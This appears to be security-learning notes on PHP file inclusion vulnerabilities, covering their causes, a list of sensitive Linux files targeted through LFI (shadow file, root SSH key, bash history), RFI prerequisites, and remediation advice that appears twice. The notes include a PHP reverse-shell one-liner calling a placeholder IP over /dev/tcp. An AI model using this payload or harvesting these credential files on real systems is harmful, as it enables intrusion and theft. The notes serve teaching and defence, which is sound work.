File Inclusion

The main issue with these is input validation, the user inputs are not sanitized or validated, and the user controls them
When input is not validated, the user can pass any input to the function, causing a vulnerability

Allows attackers to read OS resources
- local files running an application
Exploit this vulnerability by manipulating and abusing the web application's URL to locate files and access files or directories stored outside the apps root directory
Happen when user's inputs is passed to a function like file_get_contents in PHP to read the content of a file

Location

Description

/etc/issue

contains a message or system identification to be printed before the login attempt.

/etc/profile

controls system-wide default variables (Export variables, File creation mask, etc.)

/proc/version

specifies the version of the Linux kernel

/etc/passwd

has all registered user that has access to a system

/etc/shadow

contains information about the system's user's password

/root/.bash_history

contains the history command for root user

/var/log/dmessage

contains global system messages, including messages that are logged during system startup

/var/mail/root

all emails for root user

/root/.ssh/id_rsa

Private SSH keys for a root or any known valid user on the server

/var/log/apache2/access.log

the accessed requests for Apache webserver

C:\boot.ini

contains the boot options for computers with BIOS firmware

Technique to include remote files and into a vulnerable application
One requirement for RFI is that the allow_url_fopen option needs to be on
Allows an attacker to gain RCE on the server and can lead to
- Sensitive Information Disclosure
- Cross-site Scripting (XSS)
- DoS

Local File Inclusion

<?php
exec("/bin/bash -c `bash -i >& /dev/tcp/<IP><Port> 0>&1`")
?>

Keep system and services, including web application frameworks, updated with the latest version
Turn off PHP errors to avoid leaking the path of the application and other potentially revealing information
A WAF is a good option to help mitigate web application hacks
Disable some PHP features that cause file inclusion vulnerabilities if your web app doesn't need them (allow_url_fopen and allow_url_include)
Carefully analyze the web application and allow only protocols and PHP wrappers that are in need
Never trust user input, and make sure to implement proper input validation against file inclusion
Implement whitelisting for file names and locations as well as blacklisting

Last updated 11 months ago

Remediation

Keep system and services, including web application frameworks, updated with the latest version

Turn off PHP errors to avoid leaking the path of the application and other potentially revealing information

A WAF is a good option to help mitigate web application hacks

Disable some PHP features that cause file inclusion vulnerabilities if your web app doesn't need them (allow_url_fopen and allow_url_include)

Carefully analyze the web application and allow only protocols and PHP wrappers that are in need

Never trust user input, and make sure to implement proper input validation against file inclusion

Implement whitelisting for file names and locations as well as blacklisting